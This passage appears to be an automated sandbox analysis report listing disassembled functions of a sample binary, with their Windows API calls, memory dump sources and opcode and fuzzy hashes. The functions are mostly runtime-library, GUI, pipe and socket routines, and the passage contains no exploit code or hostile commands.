            • Opcode Fuzzy Hash: 1074c6360ab1ea96f12e6b68251886f703f27d3f812910e9e024c9f93010609b
            • Instruction Fuzzy Hash: 3F51D4A1A087D57EFB3793388C55BBA7EE95B46300F0884CAE2D6574C2D294EC88D761
            Function 00FD542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetConsoleCP.KERNEL32(00FE3CD6,?,?,?,?,?,?,?,?,00FD5BA3,?,?,00FE3CD6,?,?), ref: 00FD5470
            • __fassign.LIBCMT ref: 00FD54EB
            • __fassign.LIBCMT ref: 00FD5506
            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00FE3CD6,00000005,00000000,00000000), ref: 00FD552C
            • WriteFile.KERNEL32(?,00FE3CD6,00000000,00FD5BA3,00000000,?,?,?,?,?,?,?,?,?,00FD5BA3,?), ref: 00FD554B
            • WriteFile.KERNEL32(?,?,00000001,00FD5BA3,00000000,?,?,?,?,?,?,?,?,?,00FD5BA3,?), ref: 00FD5584
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 166a4fff5226daf40e8ff3e2a3bf38870fa4626d8d55ad9ab8742db0f65be64a
            • Instruction ID: cdff2802d6f0d6ee505c4783a07a4b863837b5392d09f79c65cac4317e2a1cf8
            • Opcode Fuzzy Hash: 166a4fff5226daf40e8ff3e2a3bf38870fa4626d8d55ad9ab8742db0f65be64a
            • Instruction Fuzzy Hash: 6A51B0B19006499FDB11CFA8D841BEEBBFAAF09710F18411BF555E3381D6309A41DB60
            Function 00FC2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
            Download Yara Rule
            APIs
            • _ValidateLocalCookies.LIBCMT ref: 00FC2D4B
            • ___except_validate_context_record.LIBVCRUNTIME ref: 00FC2D53
            • _ValidateLocalCookies.LIBCMT ref: 00FC2DE1
            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FC2E0C
            • _ValidateLocalCookies.LIBCMT ref: 00FC2E61
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
            • String ID: csm
            • API String ID: 1170836740-1018135373
            • Opcode ID: 1f0bcf3188d6239844470ec3a649e77e72af27fb9aff685bbce7989fdce9d243
            • Instruction ID: c7bee0ff1267fc359e4d3f6f17375f8275f9f705b2d7257f37227093f5eea95d
            • Opcode Fuzzy Hash: 1f0bcf3188d6239844470ec3a649e77e72af27fb9aff685bbce7989fdce9d243
            • Instruction Fuzzy Hash: 9D41B135E0020AABCF10DF68CE86F9EBBA5FF44324F148159E8156B392DB359A05DB90
            Function 010210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0102304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
              • Part of subcall function 0102304E: _wcslen.LIBCMT ref: 0102309B
            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01021112
            • WSAGetLastError.WSOCK32 ref: 01021121
            • WSAGetLastError.WSOCK32 ref: 010211C9
            • closesocket.WSOCK32(00000000), ref: 010211F9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
            • String ID:
            • API String ID: 2675159561-0
            • Opcode ID: e7f1baaa17d6f3f4bfb053353681e4e1629d211064a8bcc471c3429e623fa94a
            • Instruction ID: 09b3b28d3a49fb08a44c5d2553c0c42c8c061e8c82f797cff2423dcb924cbaff
            • Opcode Fuzzy Hash: e7f1baaa17d6f3f4bfb053353681e4e1629d211064a8bcc471c3429e623fa94a
            • Instruction Fuzzy Hash: 3C411831600214AFEB209F28C884BA9BBE9FF45324F148099FD95EB285C775ED41CBE1
            Function 0100CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0100CF22,?), ref: 0100DDFD
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0100CF22,?), ref: 0100DE16
            • lstrcmpiW.KERNEL32(?,?), ref: 0100CF45
            • MoveFileW.KERNEL32(?,?), ref: 0100CF7F
            • _wcslen.LIBCMT ref: 0100D005
            • _wcslen.LIBCMT ref: 0100D01B
            • SHFileOperationW.SHELL32(?), ref: 0100D061
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
            • String ID: \*.*
            • API String ID: 3164238972-1173974218
            • Opcode ID: 43c73948f2e1dde1b8e0b91fab5290dd70c287d1ca1e6caa14ab9ac58d0479e1
            • Instruction ID: babd3611152c993f6df670d1c48233091c5fcdecf9eac75ad82aa6edfcdf645b
            • Opcode Fuzzy Hash: 43c73948f2e1dde1b8e0b91fab5290dd70c287d1ca1e6caa14ab9ac58d0479e1
            • Instruction Fuzzy Hash: 164157B19452195EFF53EBA4DA81EED77F8AF44380F0000EAD549EB181EB35A644CB51
            Function 01032DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01032E1C
            • GetWindowLongW.USER32(00000000,000000F0), ref: 01032E4F
            • GetWindowLongW.USER32(00000000,000000F0), ref: 01032E84
            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01032EB6
            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01032EE0
            • GetWindowLongW.USER32(00000000,000000F0), ref: 01032EF1
            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01032F0B
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LongWindow$MessageSend
            • String ID:
            • API String ID: 2178440468-0
            • Opcode ID: fcb191c4b1272a409e5995f461c8ae41613303d2f62949dcb2b4725a67958fa8
            • Instruction ID: ae151d61b8347999c64298d71d95cf0b919cc48e70c6fce12c1f08d605faa21f
            • Opcode Fuzzy Hash: fcb191c4b1272a409e5995f461c8ae41613303d2f62949dcb2b4725a67958fa8
            • Instruction Fuzzy Hash: AC312635604250AFEB21CF1CDD85F6537E8FB8A710F1501A5FA80DF2A6CB76A840DB60
            Function 01007726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01007769
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0100778F
            • SysAllocString.OLEAUT32(00000000), ref: 01007792
            • SysAllocString.OLEAUT32(?), ref: 010077B0
            • SysFreeString.OLEAUT32(?), ref: 010077B9
            • StringFromGUID2.OLE32(?,?,00000028), ref: 010077DE
            • SysAllocString.OLEAUT32(?), ref: 010077EC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
            • String ID:
            • API String ID: 3761583154-0
            • Opcode ID: a809a4e92d87534bc10cafcc7d46815aba5baef0c8898380cd8bed777e47896c
            • Instruction ID: 72b29b131ddb07f6a90dcaed11169096c3f365d0104ace4392bc3ad4a6ed15b4
            • Opcode Fuzzy Hash: a809a4e92d87534bc10cafcc7d46815aba5baef0c8898380cd8bed777e47896c
            • Instruction Fuzzy Hash: 2421C976600219AFEF11DEACCC44CBB77ECFB09364B004065FA88DB191D678EC418760
            Function 010077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01007842
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01007868
            • SysAllocString.OLEAUT32(00000000), ref: 0100786B
            • SysAllocString.OLEAUT32 ref: 0100788C
            • SysFreeString.OLEAUT32 ref: 01007895
            • StringFromGUID2.OLE32(?,?,00000028), ref: 010078AF
            • SysAllocString.OLEAUT32(?), ref: 010078BD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
            • String ID:
            • API String ID: 3761583154-0
            • Opcode ID: 2f4fabe73df50c39e1f00f3ab5f2504796599facccb2ecfb33415a46c3533351
            • Instruction ID: 74bf6170cac79a77401ebbf2084e4f5e53beb604643072e3203469ed3b585dba
            • Opcode Fuzzy Hash: 2f4fabe73df50c39e1f00f3ab5f2504796599facccb2ecfb33415a46c3533351
            • Instruction Fuzzy Hash: 07216232604204AFEB119FACDC88DBA77ECEB09760B108125F995DB295DA78ED41CB74
            Function 010105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
            Download Yara Rule
            APIs
            • GetStdHandle.KERNEL32(000000F6), ref: 010105C6
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01010601
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateHandlePipe
            • String ID: nul
            • API String ID: 1424370930-2873401336
            • Opcode ID: 30443faa609958b4dff2a73c2940cb29d05959ef342c3f228305d011e93b60bf
            • Instruction ID: 84982cffede36cbd7e51afac8f408e99dcb529ce5f76faa037497eb0548b71f7
            • Opcode Fuzzy Hash: 30443faa609958b4dff2a73c2940cb29d05959ef342c3f228305d011e93b60bf
            • Instruction Fuzzy Hash: 6E2192755003059BEB209F6DC804A9ABBE8BF89724F304E59F9E1E72DCD7B59590CB20
            Function 010104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
            Download Yara Rule
            APIs
            • GetStdHandle.KERNEL32(0000000C), ref: 010104F2
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0101052E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateHandlePipe
            • String ID: nul
            • API String ID: 1424370930-2873401336
            • Opcode ID: 5f545cd12447859e71f97c2f1704d94ae85cec084278f25c7c3d25d2ba8198a8
            • Instruction ID: e3de293acbf2ed46c98ad641020d976d86b185f8ae9fe26a2554fa57e97ba0e1
            • Opcode Fuzzy Hash: 5f545cd12447859e71f97c2f1704d94ae85cec084278f25c7c3d25d2ba8198a8
            • Instruction Fuzzy Hash: 06218B71600305EBEB209F29D844A9BBBE8BF44764F204A59F9E1E72DCD7B59590CB20
            Function 010340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
              • Part of subcall function 00FA600E: GetStockObject.GDI32(00000011), ref: 00FA6060
              • Part of subcall function 00FA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01034112
            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0103411F
            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0103412A
            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01034139
            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01034145
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$CreateObjectStockWindow
            • String ID: Msctls_Progress32
            • API String ID: 1025951953-3636473452
            • Opcode ID: c54332b76f0f0f8f281e0f74d6cf961dfca2353ff8927c035a36ae09a7032f75
            • Instruction ID: 5c557e0b98e710c338766169c0a060f71038fa6868960fcc4798d8123ad95a25
            • Opcode Fuzzy Hash: c54332b76f0f0f8f281e0f74d6cf961dfca2353ff8927c035a36ae09a7032f75
            • Instruction Fuzzy Hash: D911B2B2240219BEEF218E64CC85EE77F9DEF49798F014111FA58E6050C7769C21DBA4
            Function 00FDD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00FDD7A3: _free.LIBCMT ref: 00FDD7CC
            • _free.LIBCMT ref: 00FDD82D
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FDD838
            • _free.LIBCMT ref: 00FDD843
            • _free.LIBCMT ref: 00FDD897
            • _free.LIBCMT ref: 00FDD8A2
            • _free.LIBCMT ref: 00FDD8AD
            • _free.LIBCMT ref: 00FDD8B8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
            • Instruction ID: d948f33a78661a4cbf1dc467853e75ff64316e541491c76238148368501e8ba5
            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
            • Instruction Fuzzy Hash: 14115171540B04AAD621BFB0CC47FCB7BEE6F10700F480826B29DA6292DA69B5057691
            Function 0100DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0100DA74
            • LoadStringW.USER32(00000000), ref: 0100DA7B
            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0100DA91
            • LoadStringW.USER32(00000000), ref: 0100DA98
            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0100DADC
            Strings
            • %s (%d) : ==> %s: %s %s, xrefs: 0100DAB9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HandleLoadModuleString$Message
            • String ID: %s (%d) : ==> %s: %s %s
            • API String ID: 4072794657-3128320259
            • Opcode ID: f0da7684a677e9d9b79bd524a5068ce69113e3a4802504aab148cdc2388ec665
            • Instruction ID: e12751b5d3613034841f3e7813039ea6100c56721d5750043a370d204621212a
            • Opcode Fuzzy Hash: f0da7684a677e9d9b79bd524a5068ce69113e3a4802504aab148cdc2388ec665
            • Instruction Fuzzy Hash: 970162F25002087FF7119BE49E89EEB376CE708301F400496B786F2041EA799E844B74
            Function 0101096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
            Download Yara Rule
            APIs
            • InterlockedExchange.KERNEL32(011DF9F0,011DF9F0), ref: 0101097B
            • EnterCriticalSection.KERNEL32(011DF9D0,00000000), ref: 0101098D
            • TerminateThread.KERNEL32(0047002D,000001F6), ref: 0101099B
            • WaitForSingleObject.KERNEL32(0047002D,000003E8), ref: 010109A9
            • CloseHandle.KERNEL32(0047002D), ref: 010109B8
            • InterlockedExchange.KERNEL32(011DF9F0,000001F6), ref: 010109C8
            • LeaveCriticalSection.KERNEL32(011DF9D0), ref: 010109CF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
            • String ID:
            • API String ID: 3495660284-0
            • Opcode ID: 9b32433c13ad36c019965dd4b0c4f684157b3ed300c8d69558a4de433277f7b6
            • Instruction ID: 8f9c8252d9c04ef0547cdd137cd3c8e93938b2c7bf2a1414f3516011a75cde47
            • Opcode Fuzzy Hash: 9b32433c13ad36c019965dd4b0c4f684157b3ed300c8d69558a4de433277f7b6
            • Instruction Fuzzy Hash: 35F0CD31442512BBF7615B94EF89AD67A69BF05702F401016F285A0898C77A9575CF90
            Function 00FD01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
            Download Yara Rule
            APIs
            • __allrem.LIBCMT ref: 00FD00BA
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD00D6
            • __allrem.LIBCMT ref: 00FD00ED
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD010B
            • __allrem.LIBCMT ref: 00FD0122
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0140
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
            • String ID:
            • API String ID: 1992179935-0
            • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
            • Instruction ID: 9b6a1ec8fd06acf686c032250ba795e115eebf326f283828ec5508fd86d3885e
            • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
            • Instruction Fuzzy Hash: 5781E872A007069BE7249E29CC42B6AB3EAEF41374F28423FF551D7381EB74D904A790
            Function 01021D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 01023149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0102101C,00000000,?,?,00000000), ref: 01023195
            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01021DC0
            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01021DE1
            • WSAGetLastError.WSOCK32 ref: 01021DF2
            • inet_ntoa.WSOCK32(?), ref: 01021E8C
            • htons.WSOCK32(?,?,?,?,?), ref: 01021EDB
            • _strlen.LIBCMT ref: 01021F35
              • Part of subcall function 010039E8: _strlen.LIBCMT ref: 010039F2
              • Part of subcall function 00FA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00FBCF58,?,?,?), ref: 00FA6DBA
              • Part of subcall function 00FA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00FBCF58,?,?,?), ref: 00FA6DED
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
            • String ID:
            • API String ID: 1923757996-0
            • Opcode ID: f679aa8d0f05fb178c43bdd4373f27921bfd3df04f7801434a1afe0a748c77bd
